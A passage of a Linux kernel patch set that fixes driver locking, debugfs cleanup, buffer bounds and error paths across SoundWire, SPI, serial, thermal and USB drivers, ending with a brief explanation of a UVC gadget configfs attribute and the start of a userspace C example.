+ 		dev_err(dev, "Probe of %s failed: %d\n", name, ret);
+ 		dev_pm_domain_detach(dev, false);
+ 		return ret;
+ 	}
+ 
++	mutex_lock(&slave->sdw_dev_lock);
++
+ 	/* device is probed so let's read the properties now */
+ 	if (drv->ops && drv->ops->read_prop)
+ 		drv->ops->read_prop(slave);
+@@ -167,14 +166,12 @@ static int sdw_drv_remove(struct device *dev)
+ 	int ret = 0;
+ 
+ 	mutex_lock(&slave->sdw_dev_lock);
+-
+ 	slave->probed = false;
++	mutex_unlock(&slave->sdw_dev_lock);
+ 
+ 	if (drv->remove)
+ 		ret = drv->remove(slave);
+ 
+-	mutex_unlock(&slave->sdw_dev_lock);
+-
+ 	dev_pm_domain_detach(dev, false);
+ 
+ 	return ret;
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index 27699f341f2c5..5213873221458 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -555,6 +555,29 @@ cdns_fill_msg_resp(struct sdw_cdns *cdns,
+ 	return SDW_CMD_OK;
+ }
+ 
++static void cdns_read_response(struct sdw_cdns *cdns)
++{
++	u32 num_resp, cmd_base;
++	int i;
++
++	/* RX_FIFO_AVAIL can be 2 entries more than the FIFO size */
++	BUILD_BUG_ON(ARRAY_SIZE(cdns->response_buf) < CDNS_MCP_IP_MAX_CMD_LEN + 2);
++
++	num_resp = cdns_readl(cdns, CDNS_MCP_FIFOSTAT);
++	num_resp &= CDNS_MCP_RX_FIFO_AVAIL;
++	if (num_resp > ARRAY_SIZE(cdns->response_buf)) {
++		dev_warn(cdns->dev, "RX AVAIL %d too long\n", num_resp);
++		num_resp = ARRAY_SIZE(cdns->response_buf);
++	}
++
++	cmd_base = CDNS_MCP_CMD_BASE;
++
++	for (i = 0; i < num_resp; i++) {
++		cdns->response_buf[i] = cdns_readl(cdns, cmd_base);
++		cmd_base += CDNS_MCP_CMD_WORD_LEN;
++	}
++}
++
+ static enum sdw_command_response
+ _cdns_xfer_msg(struct sdw_cdns *cdns, struct sdw_msg *msg, int cmd,
+ 	       int offset, int count, bool defer)
+@@ -596,6 +619,10 @@ _cdns_xfer_msg(struct sdw_cdns *cdns, struct sdw_msg *msg, int cmd,
+ 		dev_err(cdns->dev, "IO transfer timed out, cmd %d device %d addr %x len %d\n",
+ 			cmd, msg->dev_num, msg->addr, msg->len);
+ 		msg->len = 0;
++
++		/* Drain anything in the RX_FIFO */
++		cdns_read_response(cdns);
++
+ 		return SDW_CMD_TIMEOUT;
+ 	}
+ 
+@@ -769,22 +796,6 @@ EXPORT_SYMBOL(cdns_read_ping_status);
+  * IRQ handling
+  */
+ 
+-static void cdns_read_response(struct sdw_cdns *cdns)
+-{
+-	u32 num_resp, cmd_base;
+-	int i;
+-
+-	num_resp = cdns_readl(cdns, CDNS_MCP_FIFOSTAT);
+-	num_resp &= CDNS_MCP_RX_FIFO_AVAIL;
+-
+-	cmd_base = CDNS_MCP_CMD_BASE;
+-
+-	for (i = 0; i < num_resp; i++) {
+-		cdns->response_buf[i] = cdns_readl(cdns, cmd_base);
+-		cmd_base += CDNS_MCP_CMD_WORD_LEN;
+-	}
+-}
+-
+ static int cdns_update_slave_status(struct sdw_cdns *cdns,
+ 				    u64 slave_intstat)
+ {
+diff --git a/drivers/soundwire/cadence_master.h b/drivers/soundwire/cadence_master.h
+index 0434d70d4b1f5..e0a64b28c6b9c 100644
+--- a/drivers/soundwire/cadence_master.h
++++ b/drivers/soundwire/cadence_master.h
+@@ -8,6 +8,12 @@
+ #define SDW_CADENCE_GSYNC_KHZ		4 /* 4 kHz */
+ #define SDW_CADENCE_GSYNC_HZ		(SDW_CADENCE_GSYNC_KHZ * 1000)
+ 
++/*
++ * The Cadence IP supports up to 32 entries in the FIFO, though implementations
++ * can configure the IP to have a smaller FIFO.
++ */
++#define CDNS_MCP_IP_MAX_CMD_LEN		32
++
+ /**
+  * struct sdw_cdns_pdi: PDI (Physical Data Interface) instance
+  *
+@@ -117,7 +123,12 @@ struct sdw_cdns {
+ 	struct sdw_bus bus;
+ 	unsigned int instance;
+ 
+-	u32 response_buf[0x80];
++	/*
++	 * The datasheet says the RX FIFO AVAIL can be 2 entries more
++	 * than the FIFO capacity, so allow for this.
++	 */
++	u32 response_buf[CDNS_MCP_IP_MAX_CMD_LEN + 2];
++
+ 	struct completion tx_complete;
+ 	struct sdw_defer *defer;
+ 
+diff --git a/drivers/spi/spi-tegra210-quad.c b/drivers/spi/spi-tegra210-quad.c
+index 9f356612ba7e5..06c54d49076ae 100644
+--- a/drivers/spi/spi-tegra210-quad.c
++++ b/drivers/spi/spi-tegra210-quad.c
+@@ -1156,6 +1156,10 @@ static int tegra_qspi_combined_seq_xfer(struct tegra_qspi *tqspi,
+ 				ret = -EIO;
+ 				goto exit;
+ 			}
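++			/* Deassert CS after the data phase unless cs_change keeps it */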
++			if (!xfer->cs_change) {
++				tegra_qspi_transfer_end(spi);
++				spi_transfer_delay_exec(xfer);
++			}
+ 			break;
+ 		default:
+ 			ret = -EINVAL;
+@@ -1164,14 +1168,14 @@ static int tegra_qspi_combined_seq_xfer(struct tegra_qspi *tqspi,
+ 		msg->actual_length += xfer->len;
+ 		transfer_phase++;
+ 	}
+-	if (!xfer->cs_change) {
+-		tegra_qspi_transfer_end(spi);
+-		spi_transfer_delay_exec(xfer);
+-	}
+ 	ret = 0;
+ 
+ exit:
+ 	msg->status = ret;
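++	/* On error, still deassert CS and honour the transfer delay */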
++	if (ret < 0) {
++		tegra_qspi_transfer_end(spi);
++		spi_transfer_delay_exec(xfer);
++	}
+ 
+ 	return ret;
+ }
+@@ -1297,7 +1301,7 @@ static bool tegra_qspi_validate_cmb_seq(struct tegra_qspi *tqspi,
+ 	if (xfer->len > 4 || xfer->len < 3)
+ 		return false;
+ 	xfer = list_next_entry(xfer, transfer_list);
+-	if (!tqspi->soc_data->has_dma || xfer->len > (QSPI_FIFO_DEPTH << 2))
++	if (!tqspi->soc_data->has_dma && xfer->len > (QSPI_FIFO_DEPTH << 2))
+ 		return false;
+ 
+ 	return true;
+diff --git a/drivers/staging/emxx_udc/emxx_udc.c b/drivers/staging/emxx_udc/emxx_udc.c
+index b4e19174bef2e..f9765841c4aa3 100644
+--- a/drivers/staging/emxx_udc/emxx_udc.c
++++ b/drivers/staging/emxx_udc/emxx_udc.c
+@@ -2587,10 +2587,15 @@ static int nbu2ss_ep_queue(struct usb_ep *_ep,
+ 		req->unaligned = false;
+ 
+ 	if (req->unaligned) {
+-		if (!ep->virt_buf)
++		if (!ep->virt_buf) {
+ 			ep->virt_buf = dma_alloc_coherent(udc->dev, PAGE_SIZE,
+ 							  &ep->phys_buf,
+ 							  GFP_ATOMIC | GFP_DMA);
++			if (!ep->virt_buf) {
++				spin_unlock_irqrestore(&udc->lock, flags);
++				return -ENOMEM;
++			}
++		}
+ 		if (ep->epnum > 0)  {
+ 			if (ep->direct == USB_DIR_IN)
+ 				memcpy(ep->virt_buf, req->req.buf,
+diff --git a/drivers/staging/pi433/pi433_if.c b/drivers/staging/pi433/pi433_if.c
+index d4e06a3929f3d..b59f6a4cb611a 100644
+--- a/drivers/staging/pi433/pi433_if.c
++++ b/drivers/staging/pi433/pi433_if.c
+@@ -55,6 +55,7 @@
+ static dev_t pi433_dev;
+ static DEFINE_IDR(pi433_idr);
+ static DEFINE_MUTEX(minor_lock); /* Protect idr accesses */
++static struct dentry *root_dir;	/* debugfs root directory for the driver */
+ 
+ static struct class *pi433_class; /* mainly for udev to create /dev/pi433 */
+ 
+@@ -1306,8 +1307,7 @@ static int pi433_probe(struct spi_device *spi)
+ 	/* spi setup */
+ 	spi_set_drvdata(spi, device);
+ 
+-	entry = debugfs_create_dir(dev_name(device->dev),
+-				   debugfs_lookup(KBUILD_MODNAME, NULL));
++	entry = debugfs_create_dir(dev_name(device->dev), root_dir);
+ 	debugfs_create_file("regs", 0400, entry, device, &pi433_debugfs_regs_fops);
+ 
+ 	return 0;
+@@ -1333,9 +1333,8 @@ RX_failed:
+ static void pi433_remove(struct spi_device *spi)
+ {
+ 	struct pi433_device	*device = spi_get_drvdata(spi);
+-	struct dentry *mod_entry = debugfs_lookup(KBUILD_MODNAME, NULL);
+ 
+-	debugfs_remove(debugfs_lookup(dev_name(device->dev), mod_entry));
++	debugfs_lookup_and_remove(dev_name(device->dev), root_dir);
+ 
+ 	/* free GPIOs */
+ 	free_gpio(device);
+@@ -1408,7 +1407,7 @@ static int __init pi433_init(void)
+ 		return PTR_ERR(pi433_class);
+ 	}
+ 
+-	debugfs_create_dir(KBUILD_MODNAME, NULL);
++	root_dir = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 
+ 	status = spi_register_driver(&pi433_spi_driver);
+ 	if (status < 0) {
+@@ -1427,7 +1426,7 @@ static void __exit pi433_exit(void)
+ 	spi_unregister_driver(&pi433_spi_driver);
+ 	class_destroy(pi433_class);
+ 	unregister_chrdev(MAJOR(pi433_dev), pi433_spi_driver.driver.name);
+-	debugfs_remove_recursive(debugfs_lookup(KBUILD_MODNAME, NULL));
++	debugfs_remove(root_dir);
+ }
+ module_exit(pi433_exit);
+ 
+diff --git a/drivers/thermal/intel/Kconfig b/drivers/thermal/intel/Kconfig
+index f0c8456792509..e3cfad10d5dd4 100644
+--- a/drivers/thermal/intel/Kconfig
++++ b/drivers/thermal/intel/Kconfig
+@@ -64,7 +64,8 @@ endmenu
+ 
+ config INTEL_BXT_PMIC_THERMAL
+ 	tristate "Intel Broxton PMIC thermal driver"
+-	depends on X86 && INTEL_SOC_PMIC_BXTWC && REGMAP
++	depends on X86 && INTEL_SOC_PMIC_BXTWC
++	select REGMAP
+ 	help
+ 	  Select this driver for Intel Broxton PMIC with ADC channels monitoring
+ 	  system temperature measurements and alerts.
+diff --git a/drivers/thermal/intel/intel_quark_dts_thermal.c b/drivers/thermal/intel/intel_quark_dts_thermal.c
+index 3eafc6b0e6c30..b43fbd5eaa6b4 100644
+--- a/drivers/thermal/intel/intel_quark_dts_thermal.c
++++ b/drivers/thermal/intel/intel_quark_dts_thermal.c
+@@ -415,22 +415,14 @@ MODULE_DEVICE_TABLE(x86cpu, qrk_thermal_ids);
+ 
+ static int __init intel_quark_thermal_init(void)
+ {
+-	int err = 0;
+-
+ 	if (!x86_match_cpu(qrk_thermal_ids) || !iosf_mbi_available())
+ 		return -ENODEV;
+ 
+ 	soc_dts = alloc_soc_dts();
+-	if (IS_ERR(soc_dts)) {
+-		err = PTR_ERR(soc_dts);
+-		goto err_free;
+-	}
++	if (IS_ERR(soc_dts))
++		return PTR_ERR(soc_dts);
+ 
+ 	return 0;
+-
+-err_free:
+-	free_soc_dts(soc_dts);
+-	return err;
+ }
+ 
+ static void __exit intel_quark_thermal_exit(void)
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 23910ac724b11..b136c596fe6ae 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1462,12 +1462,32 @@ static void lpuart_break_ctl(struct uart_port *port, int break_state)
+ 
+ static void lpuart32_break_ctl(struct uart_port *port, int break_state)
+ {
+-	unsigned long temp;
++	unsigned long temp, modem;
++	struct tty_struct *tty;
++	unsigned int cflag = 0;
++
++	tty = tty_port_tty_get(&port->state->port);
++	if (tty) {
++		cflag = tty->termios.c_cflag;
++		tty_kref_put(tty);
++	}
+ 
+ 	temp = lpuart32_read(port, UARTCTRL) & ~UARTCTRL_SBK;
++	modem = lpuart32_read(port, UARTMODIR);
+ 
+-	if (break_state != 0)
++	if (break_state != 0) {
+ 		temp |= UARTCTRL_SBK;
++		/*
++		 * LPUART CTS has higher priority than SBK, need to disable CTS before
++		 * asserting SBK to avoid any interference if flow control is enabled.
++		 */
++		if (cflag & CRTSCTS && modem & UARTMODIR_TXCTSE)
++			lpuart32_write(port, modem & ~UARTMODIR_TXCTSE, UARTMODIR);
++	} else {
++		/* Re-enable CTS when the break is turned off. */
++		if (cflag & CRTSCTS && !(modem & UARTMODIR_TXCTSE))
++			lpuart32_write(port, modem | UARTMODIR_TXCTSE, UARTMODIR);
++	}
+ 
+ 	lpuart32_write(port, temp, UARTCTRL);
+ }
+diff --git a/drivers/tty/serial/pch_uart.c b/drivers/tty/serial/pch_uart.c
+index 9576ba8bbc40e..cc83b772b7ca9 100644
+--- a/drivers/tty/serial/pch_uart.c
++++ b/drivers/tty/serial/pch_uart.c
+@@ -1775,7 +1775,7 @@ static void pch_uart_exit_port(struct eg20t_port *priv)
+ 	char name[32];
+ 
+ 	snprintf(name, sizeof(name), "uart%d_regs", priv->port.line);
+-	debugfs_remove(debugfs_lookup(name, NULL));
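++	/* also drops the reference a bare debugfs_lookup() would leave */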
++	debugfs_lookup_and_remove(name, NULL);
+ 	uart_remove_one_port(&pch_uart_driver, &priv->port);
+ 	free_page((unsigned long)priv->rxbuf.buf);
+ }
+diff --git a/drivers/tty/serial/sc16is7xx.c b/drivers/tty/serial/sc16is7xx.c
+index 39f92eb1e6989..29c94be091596 100644
+--- a/drivers/tty/serial/sc16is7xx.c
++++ b/drivers/tty/serial/sc16is7xx.c
+@@ -1423,25 +1423,6 @@ static int sc16is7xx_probe(struct device *dev,
+ 	}
+ 	sched_set_fifo(s->kworker_task);
+ 
+-#ifdef CONFIG_GPIOLIB
+-	if (devtype->nr_gpio) {
+-		/* Setup GPIO cotroller */
+-		s->gpio.owner		 = THIS_MODULE;
+-		s->gpio.parent		 = dev;
+-		s->gpio.label		 = dev_name(dev);
+-		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
+-		s->gpio.get		 = sc16is7xx_gpio_get;
+-		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
+-		s->gpio.set		 = sc16is7xx_gpio_set;
+-		s->gpio.base		 = -1;
+-		s->gpio.ngpio		 = devtype->nr_gpio;
+-		s->gpio.can_sleep	 = 1;
+-		ret = gpiochip_add_data(&s->gpio, s);
+-		if (ret)
+-			goto out_thread;
+-	}
+-#endif
+-
+ 	/* reset device, purging any pending irq / data */
+ 	regmap_write(s->regmap, SC16IS7XX_IOCONTROL_REG << SC16IS7XX_REG_SHIFT,
+ 			SC16IS7XX_IOCONTROL_SRESET_BIT);
+@@ -1518,6 +1499,25 @@ static int sc16is7xx_probe(struct device *dev,
+ 				s->p[u].irda_mode = true;
+ 	}
+ 
++#ifdef CONFIG_GPIOLIB
++	if (devtype->nr_gpio) {
++		/* Set up the GPIO controller */
++		s->gpio.owner		 = THIS_MODULE;
++		s->gpio.parent		 = dev;
++		s->gpio.label		 = dev_name(dev);
++		s->gpio.direction_input	 = sc16is7xx_gpio_direction_input;
++		s->gpio.get		 = sc16is7xx_gpio_get;
++		s->gpio.direction_output = sc16is7xx_gpio_direction_output;
++		s->gpio.set		 = sc16is7xx_gpio_set;
++		s->gpio.base		 = -1;
++		s->gpio.ngpio		 = devtype->nr_gpio;
++		s->gpio.can_sleep	 = 1;
++		ret = gpiochip_add_data(&s->gpio, s);
++		if (ret)
++			goto out_thread;
++	}
++#endif
++
+ 	/*
+ 	 * Setup interrupt. We first try to acquire the IRQ line as level IRQ.
+ 	 * If that succeeds, we can allow sharing the interrupt as well.
+@@ -1537,18 +1537,19 @@ static int sc16is7xx_probe(struct device *dev,
+ 	if (!ret)
+ 		return 0;
+ 
+-out_ports:
+-	for (i--; i >= 0; i--) {
+-		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
+-		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
+-	}
+-
+ #ifdef CONFIG_GPIOLIB
+ 	if (devtype->nr_gpio)
+ 		gpiochip_remove(&s->gpio);
+ 
+ out_thread:
+ #endif
++
++out_ports:
++	for (i--; i >= 0; i--) {
++		uart_remove_one_port(&sc16is7xx_uart, &s->p[i].port);
++		clear_bit(s->p[i].port.line, &sc16is7xx_lines);
++	}
++
+ 	kthread_stop(s->kworker_task);
+ 
+ out_clk:
+diff --git a/drivers/tty/tty_io.c b/drivers/tty/tty_io.c
+index 3149114bf130e..36fb945fdad48 100644
+--- a/drivers/tty/tty_io.c
++++ b/drivers/tty/tty_io.c
+@@ -1224,14 +1224,16 @@ static struct tty_struct *tty_driver_lookup_tty(struct tty_driver *driver,
+ {
+ 	struct tty_struct *tty;
+ 
+-	if (driver->ops->lookup)
++	if (driver->ops->lookup) {
+ 		if (!file)
+ 			tty = ERR_PTR(-EIO);
+ 		else
+ 			tty = driver->ops->lookup(driver, file, idx);
+-	else
++	} else {
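++		/* idx indexes directly into the tty array, so bounds-check it */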
++		if (idx >= driver->num)
++			return ERR_PTR(-EINVAL);
+ 		tty = driver->ttys[idx];
+-
++	}
+ 	if (!IS_ERR(tty))
+ 		tty_kref_get(tty);
+ 	return tty;
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index 71e091f879f0e..1dc07f9214d57 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -415,10 +415,8 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		 */
+ 		size = vcs_size(vc, attr, uni_mode);
+ 		if (size < 0) {
+-			if (read)
+-				break;
+ 			ret = size;
+-			goto unlock_out;
++			break;
+ 		}
+ 		if (pos >= size)
+ 			break;
+diff --git a/drivers/usb/chipidea/debug.c b/drivers/usb/chipidea/debug.c
+index faf6b078b6c44..bbc610e5bd69c 100644
+--- a/drivers/usb/chipidea/debug.c
++++ b/drivers/usb/chipidea/debug.c
+@@ -364,5 +364,5 @@ void dbg_create_files(struct ci_hdrc *ci)
+  */
+ void dbg_remove_files(struct ci_hdrc *ci)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(ci->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(ci->dev), usb_debug_root);
+ }
+diff --git a/drivers/usb/common/ulpi.c b/drivers/usb/common/ulpi.c
+index d7c8461976ce0..38703781ee2d1 100644
+--- a/drivers/usb/common/ulpi.c
++++ b/drivers/usb/common/ulpi.c
+@@ -271,7 +271,7 @@ static int ulpi_regs_show(struct seq_file *seq, void *data)
+ }
+ DEFINE_SHOW_ATTRIBUTE(ulpi_regs);
+ 
+-#define ULPI_ROOT debugfs_lookup(KBUILD_MODNAME, NULL)
++static struct dentry *ulpi_root;
+ 
+ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ {
+@@ -301,7 +301,7 @@ static int ulpi_register(struct device *dev, struct ulpi *ulpi)
+ 		return ret;
+ 	}
+ 
+-	root = debugfs_create_dir(dev_name(dev), ULPI_ROOT);
++	root = debugfs_create_dir(dev_name(dev), ulpi_root);
+ 	debugfs_create_file("regs", 0444, root, ulpi, &ulpi_regs_fops);
+ 
+ 	dev_dbg(&ulpi->dev, "registered ULPI PHY: vendor %04x, product %04x\n",
+@@ -349,8 +349,7 @@ EXPORT_SYMBOL_GPL(ulpi_register_interface);
+  */
+ void ulpi_unregister_interface(struct ulpi *ulpi)
+ {
+-	debugfs_remove_recursive(debugfs_lookup(dev_name(&ulpi->dev),
+-						ULPI_ROOT));
++	debugfs_lookup_and_remove(dev_name(&ulpi->dev), ulpi_root);
+ 	device_unregister(&ulpi->dev);
+ }
+ EXPORT_SYMBOL_GPL(ulpi_unregister_interface);
+@@ -360,12 +359,11 @@ EXPORT_SYMBOL_GPL(ulpi_unregister_interface);
+ static int __init ulpi_init(void)
+ {
+ 	int ret;
+-	struct dentry *root;
+ 
+-	root = debugfs_create_dir(KBUILD_MODNAME, NULL);
++	ulpi_root = debugfs_create_dir(KBUILD_MODNAME, NULL);
+ 	ret = bus_register(&ulpi_bus);
+ 	if (ret)
+-		debugfs_remove(root);
++		debugfs_remove(ulpi_root);
+ 	return ret;
+ }
+ subsys_initcall(ulpi_init);
+@@ -373,7 +371,7 @@ subsys_initcall(ulpi_init);
+ static void __exit ulpi_exit(void)
+ {
+ 	bus_unregister(&ulpi_bus);
+-	debugfs_remove_recursive(ULPI_ROOT);
++	debugfs_remove(ulpi_root);
+ }
+ module_exit(ulpi_exit);
+ 
+diff --git a/drivers/usb/core/usb.c b/drivers/usb/core/usb.c
+index 11b15d7b357ad..a415206cab043 100644
+--- a/drivers/usb/core/usb.c
++++ b/drivers/usb/core/usb.c
+@@ -998,7 +998,7 @@ static void usb_debugfs_init(void)
+ 
+ static void usb_debugfs_cleanup(void)
+ {
+-	debugfs_remove(debugfs_lookup("devices", usb_debug_root));
++	debugfs_lookup_and_remove("devices", usb_debug_root);
+ }
+ 
+ /*
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 8f9959ba9fd46..582ebd9cf9c2e 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -1117,6 +1117,7 @@ struct dwc3_scratchpad_array {
+  *		     address.
+  * @num_ep_resized: carries the current number endpoints which have had its tx
+  *		    fifo resized.
++ * @debug_root: root debugfs directory for this device to put its files in.
+  */
+ struct dwc3 {
+ 	struct work_struct	drd_work;
+@@ -1332,6 +1333,7 @@ struct dwc3 {
+ 	int			max_cfg_eps;
+ 	int			last_fifo_depth;
+ 	int			num_ep_resized;
++	struct dentry		*debug_root;
+ };
+ 
+ #define INCRX_BURST_MODE 0
+diff --git a/drivers/usb/dwc3/debug.h b/drivers/usb/dwc3/debug.h
+index 48b44b88dc252..8bb2c9e3b9ac6 100644
+--- a/drivers/usb/dwc3/debug.h
++++ b/drivers/usb/dwc3/debug.h
+@@ -414,11 +414,14 @@ static inline const char *dwc3_gadget_generic_cmd_status_string(int status)
+ 
+ #ifdef CONFIG_DEBUG_FS
+ extern void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep);
++extern void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep);
+ extern void dwc3_debugfs_init(struct dwc3 *d);
+ extern void dwc3_debugfs_exit(struct dwc3 *d);
+ #else
+ static inline void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
+ {  }
++static inline void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep)
++{  }
+ static inline void dwc3_debugfs_init(struct dwc3 *d)
+ {  }
+ static inline void dwc3_debugfs_exit(struct dwc3 *d)
+diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
+index f2b7675c7f621..850df0e6bcabf 100644
+--- a/drivers/usb/dwc3/debugfs.c
++++ b/drivers/usb/dwc3/debugfs.c
+@@ -873,27 +873,23 @@ static const struct dwc3_ep_file_map dwc3_ep_file_map[] = {
+ 	{ "GDBGEPINFO", &dwc3_ep_info_register_fops, },
+ };
+ 
+-static void dwc3_debugfs_create_endpoint_files(struct dwc3_ep *dep,
+-		struct dentry *parent)
++void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
+ {
++	struct dentry		*dir;
+ 	int			i;
+ 
++	dir = debugfs_create_dir(dep->name, dep->dwc->debug_root);
+ 	for (i = 0; i < ARRAY_SIZE(dwc3_ep_file_map); i++) {
+ 		const struct file_operations *fops = dwc3_ep_file_map[i].fops;
+ 		const char *name = dwc3_ep_file_map[i].name;
+ 
+-		debugfs_create_file(name, 0444, parent, dep, fops);
++		debugfs_create_file(name, 0444, dir, dep, fops);
+ 	}
+ }
+ 
+-void dwc3_debugfs_create_endpoint_dir(struct dwc3_ep *dep)
++void dwc3_debugfs_remove_endpoint_dir(struct dwc3_ep *dep)
+ {
+-	struct dentry		*dir;
+-	struct dentry		*root;
+-
+-	root = debugfs_lookup(dev_name(dep->dwc->dev), usb_debug_root);
+-	dir = debugfs_create_dir(dep->name, root);
+-	dwc3_debugfs_create_endpoint_files(dep, dir);
++	debugfs_lookup_and_remove(dep->name, dep->dwc->debug_root);
+ }
+ 
+ void dwc3_debugfs_init(struct dwc3 *dwc)
+@@ -911,6 +907,7 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 	dwc->regset->base = dwc->regs - DWC3_GLOBALS_REGS_START;
+ 
+ 	root = debugfs_create_dir(dev_name(dwc->dev), usb_debug_root);
++	dwc->debug_root = root;
+ 	debugfs_create_regset32("regdump", 0444, root, dwc->regset);
+ 	debugfs_create_file("lsp_dump", 0644, root, dwc, &dwc3_lsp_fops);
+ 
+@@ -929,6 +926,6 @@ void dwc3_debugfs_init(struct dwc3 *dwc)
+ 
+ void dwc3_debugfs_exit(struct dwc3 *dwc)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(dwc->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(dwc->dev), usb_debug_root);
+ 	kfree(dwc->regset);
+ }
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index 89dcfac01235f..3c63fa97a6800 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -3194,9 +3194,7 @@ static void dwc3_gadget_free_endpoints(struct dwc3 *dwc)
+ 			list_del(&dep->endpoint.ep_list);
+ 		}
+ 
+-		debugfs_remove_recursive(debugfs_lookup(dep->name,
+-				debugfs_lookup(dev_name(dep->dwc->dev),
+-					       usb_debug_root)));
++		dwc3_debugfs_remove_endpoint_dir(dep);
+ 		kfree(dep);
+ 	}
+ }
+diff --git a/drivers/usb/fotg210/fotg210-core.c b/drivers/usb/fotg210/fotg210-core.c
+index ee740a6da463f..da9ea5957ccff 100644
+--- a/drivers/usb/fotg210/fotg210-core.c
++++ b/drivers/usb/fotg210/fotg210-core.c
+@@ -127,7 +127,9 @@ static int fotg210_remove(struct platform_device *pdev)
+ 
+ #ifdef CONFIG_OF
+ static const struct of_device_id fotg210_of_match[] = {
++	{ .compatible = "faraday,fotg200" },
+ 	{ .compatible = "faraday,fotg210" },
++	/* TODO: can we also handle FUSB220? */
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, fotg210_of_match);
+diff --git a/drivers/usb/fotg210/fotg210-hcd.c b/drivers/usb/fotg210/fotg210-hcd.c
+index 51ac93a2eb98e..1c5eb8f8c19c6 100644
+--- a/drivers/usb/fotg210/fotg210-hcd.c
++++ b/drivers/usb/fotg210/fotg210-hcd.c
+@@ -862,7 +862,7 @@ static inline void remove_debug_files(struct fotg210_hcd *fotg210)
+ {
+ 	struct usb_bus *bus = &fotg210_to_hcd(fotg210)->self;
+ 
+-	debugfs_remove(debugfs_lookup(bus->bus_name, fotg210_debug_root));
++	debugfs_lookup_and_remove(bus->bus_name, fotg210_debug_root);
+ }
+ 
+ /* handshake - spin reading hc until handshake completes or fails
+diff --git a/drivers/usb/gadget/function/uvc_configfs.c b/drivers/usb/gadget/function/uvc_configfs.c
+index 76cb60d13049f..1460142fbc429 100644
+--- a/drivers/usb/gadget/function/uvc_configfs.c
++++ b/drivers/usb/gadget/function/uvc_configfs.c
+@@ -483,11 +483,68 @@ UVC_ATTR_RO(uvcg_default_output_, cname, aname)
+ UVCG_DEFAULT_OUTPUT_ATTR(b_terminal_id, bTerminalID, 8);
+ UVCG_DEFAULT_OUTPUT_ATTR(w_terminal_type, wTerminalType, 16);
+ UVCG_DEFAULT_OUTPUT_ATTR(b_assoc_terminal, bAssocTerminal, 8);
+-UVCG_DEFAULT_OUTPUT_ATTR(b_source_id, bSourceID, 8);
+ UVCG_DEFAULT_OUTPUT_ATTR(i_terminal, iTerminal, 8);
+ 
+ #undef UVCG_DEFAULT_OUTPUT_ATTR
+ 
++static ssize_t uvcg_default_output_b_source_id_show(struct config_item *item,
++						    char *page)
++{
++	struct config_group *group = to_config_group(item);
++	struct f_uvc_opts *opts;
++	struct config_item *opts_item;
++	struct mutex *su_mutex = &group->cg_subsys->su_mutex;
++	struct uvc_output_terminal_descriptor *cd;
++	int result;
++
++	mutex_lock(su_mutex); /* for navigating configfs hierarchy */
++
++	opts_item = group->cg_item.ci_parent->ci_parent->
++			ci_parent->ci_parent;
++	opts = to_f_uvc_opts(opts_item);
++	cd = &opts->uvc_output_terminal;
++
++	mutex_lock(&opts->lock);
++	result = sprintf(page, "%u\n", le8_to_cpu(cd->bSourceID));
++	mutex_unlock(&opts->lock);
++
++	mutex_unlock(su_mutex);
++
++	return result;
++}
++
++static ssize_t uvcg_default_output_b_source_id_store(struct config_item *item,
++						     const char *page, size_t len)
++{
++	struct config_group *group = to_config_group(item);
++	struct f_uvc_opts *opts;
++	struct config_item *opts_item;
++	struct mutex *su_mutex = &group->cg_subsys->su_mutex;
++	struct uvc_output_terminal_descriptor *cd;
++	int result;
++	u8 num;
++
++	result = kstrtou8(page, 0, &num);
++	if (result)
++		return result;
++
++	mutex_lock(su_mutex); /* for navigating configfs hierarchy */
++
++	opts_item = group->cg_item.ci_parent->ci_parent->
++			ci_parent->ci_parent;
++	opts = to_f_uvc_opts(opts_item);
++	cd = &opts->uvc_output_terminal;
++
++	mutex_lock(&opts->lock);
++	cd->bSourceID = num;
++	mutex_unlock(&opts->lock);
++
++	mutex_unlock(su_mutex);
++
++	return len;
++}
++UVC_ATTR(uvcg_default_output_, b_source_id, bSourceID);
++
+ static struct configfs_attribute *uvcg_default_output_attrs[] = {
+ 	&uvcg_default_output_attr_b_terminal_id,
+ 	&uvcg_default_output_attr_w_terminal_type,
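
The new show/store pair makes bSourceID the one writable attribute of the default output terminal, following the standard configfs shape: kstrtou8() to parse, the subsystem su_mutex to navigate the item hierarchy, then opts->lock around the actual field access. From userspace the attribute is an ordinary file; a small sketch of setting it from C, where the gadget name g1 and the exact path are assumptions about how the gadget was composed:

	#include <fcntl.h>
	#include <stdio.h>
	#include <unistd.h>

	int main(void)
	{
		/* Illustrative path; layout depends on the gadget config. */
		const char *attr =
			"/sys/kernel/config/usb_gadget/g1/functions/uvc.0/"
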